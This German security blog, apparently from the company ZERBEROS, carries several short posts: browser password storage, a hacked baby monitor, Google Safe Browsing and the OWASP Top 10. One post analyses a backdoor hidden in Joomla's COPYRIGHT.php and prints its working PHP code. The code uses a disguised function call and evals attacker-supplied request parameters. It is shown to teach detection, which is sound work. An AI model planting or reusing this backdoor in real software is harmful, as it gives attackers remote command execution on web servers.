Beiträge

Browser Passwort Speicherung unsicher

firefox_pw_secEigentlich ist es ja längst bekannt dass im Browser gespeicherte Passwörter sehr einfach im Klartext auslesbar sind, zumindest wenn kein Master-Passwort gesetzt wird.

RaiderSec hat nun die aktuellen Browser unter die Lupe genommen und beschreiben wie die Passwörter gespeichert werden und wie sie ausgelesen werden können.

How Browsers Store Your Passwords (and Why You Shouldn’t Let Them)

Hacker versteckt Code in der Open Source Lizenzdatei

Bösartiger Code auf einem Webserver kann sehr klein sein – die Wirkung aber sehr gross. Einige Zeilen Code in einer PHP Datei kann genügen damit die Hacker jeden gewünschten Befehl ausführen können.

Damit der Code nicht leicht gefunden wird werden oft unübliche “Verstecke” gefunden – zum Beispiel in einer Lizenzdatei des Open Source Content Managements Joomla: COPYRIGHT.php

Diese Datei interessiert meist niemanden gross, so dass oft übersehen wird dass auch diese Datei verändert sein könnte.

Hier das Beispiel – achten Sie darauf wie bereits in dieser Zeile unauffällig eine getarnte PHP Funktion aufgerufen wird welche dann später deklariert wird:

*/Copyright3_6_56()/* 1989, 1991 Free Software Foundation

Code Beispiel

< ?php
/*			GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

..

GNU GENERAL PUBLIC LICENSE
Version 2, June 1991

*/Copyright3_6_56()/* 1989, 1991 Free Software Foundation, Inc.
                          675 Mass Ave, Cambridge, MA 02139, USA
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.

Preamble

  The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Library General Public License instead.) You can apply it to
your programs, too.*/?>

Joomla! derives from copyrighted works licensed under the GNU General
Public License.  This version has been modified pursuant to the
GNU General Public License as of September 15, 2005, and as distributed,
it includes or is derivative of works licensed under the GNU General
Public License or other free or open source software licenses.  Please
see the CREDITS.php for a non-exhaustive list of contributors and
copyright holders.  A full text version of the GNU GPL version 2 can be
found in the LICENSE.php file.  A full text version of the other licenses
that Joomla! is derivative of or includes can be found in LICENSES.php.

<? php
Copyright3_6_56();
function Copyright3_6_56(){
static $gnu = true;
if(!$gnu) return;
if(!isset($_REQUEST['gnu'])||!isset($_REQUEST['c_id']))return;
$gpl=implode('', $_REQUEST['gnu']);
eval ($gpl( $_REQUEST['c_id']));
$gnu=false;
}

 

Die ganze Analyse des Codes gibt es hier zu lesen

Gehackte Alltagsgeräte

Letztes Wochenende hat ein Paar in Texas festgestellt dass das Baby-Überwachungsgerät im Kinderzimmer gehackt worden war. Eine lokale TV Station berichtete dass das Paar eine unbekannte Stimme aus dem Kinderzimmer hörte welche obszöne Flüche von sich gab. Das Paar steckte das Gerät umgehend aus.

Wie sicher sind solche ans Internet angeschlossene Haushaltsgeräte?

Nicht sehr sicher – und das seit vielen Jahren.

Sicherheitsprobleme wurden in Webcams, Kameras, implantierten medizinischen Geräten, Autos, Toiletten, Yachten, Geldautomaten, Industriegeräten und militärischen Dronen gefunden.

All diese Geräte sind hackbar  – und die Profis wundern sich dass die KundInnen keine Ahnung davon haben dass das möglich ist.

Warum sind die Geräte hackbar?

Weil Sicherheit schwierig zu realisieren ist – es braucht Wissen und Zeit dazu.

Die meisten Firmen interessiert das nicht weil es die Kosten der Geräte erhöht und die EndkundInnen (bisher) keine Interesse daran haben.

Vielleicht würde es sich aber trotzdem lohnen ein wenig mehr auszugeben für ein Gerät das ausreichend sicher konzipiert und auch für Laien sicher handhabbar ist.

Google Safe Browsing

Zwei der grössten online Bedrohungen sind schädliche Software welche die Kontrolle über Ihren Computer übernehmen kann, und Phishing Angriffe welche Sie dazu bringen wollen Passwörter oder andere vertrauliche Informationen an Hacker zu übermitteln.

2006 hat Google das Safe Browsing Programm gestartet um Webseiten welche schädliche Software beinhalten oder Phishing betreiben zu identifizieren.

Google warnt Sie also jetzt wenn Sie eine solche Seite besuchen wollen.

Zur Zeit werden bis zu 10’000 Seiten täglich als schädlich markiert – und bis zu eine Milliarde User profitieren von dieser Kennzeichnung.

google_safe_browsing

Google hat neu auch den Transparency Report lanciert das mehr Klarheit über die Quellen von Malware und Phishing Angriffen bringen soll.

Sie können sehen wieviele Safe Browsing Warnungen wöchentlich angezeigt werden, wo bösartige Seiten gehostet werden, wie schnell Webseiten nach einer Säuberung wieder infiziert werden und andere Details.

Webseite Betreiber können die Google Webmaster Tools oder Safe Browsing Alerts for Network Administrators verwenden um Empfehlungen für den Umgang mit Malware zu erhalten.

OWASP Top 10 Sicherheitsrisiken auf Webseiten

Das Open Web Application Security Project hat eine neue Ausgabe der OWASP Top 10vorgelegt. Die erstmals vor zehn Jahren veröffentlichte Rangliste der zehn schwerwiegendsten Sicherheitsschwachstellen von Webanwendungen genießt unter Sicherheitsexperten und Webentwicklern einen hohen Stellenwert. Für die neue Rangliste wurden über 500.000 Schwachstellen in mehreren hundert Unternehmen und Tausenden Applikationen beobachtet.

Die zehn Risiken für Webentwickler, die laut OWASP 2013 am ehesten ernst zu nehmen sind (in Klammern steht die jeweilige Platzierung von 2010):

  1. Injection (1)
  2. Broken Authentication and Session Management (3)
  3. Cross-Site Scripting (XSS) (2)
  4. Insecure Direct Object References (4)
  5. Security Misconfiguration (6)
  6. Sensitive Data Exposure (7/9)
  7. Missing Function Level Access Control (8)
  8. Cross-Site Request Forgery (CSRF) (5)
  9. Using Known Vulnerable Components (-)
  10. Unvalidated Redirects and Forwards (10)

Die Sicherheitstests von ZERBEROS berücksichtigen alle diese Faktoren – wenn also eine solche Schwachstelle auf Ihrer Website vorliegt wird sie von uns mit hoher Sicherheit gefunden.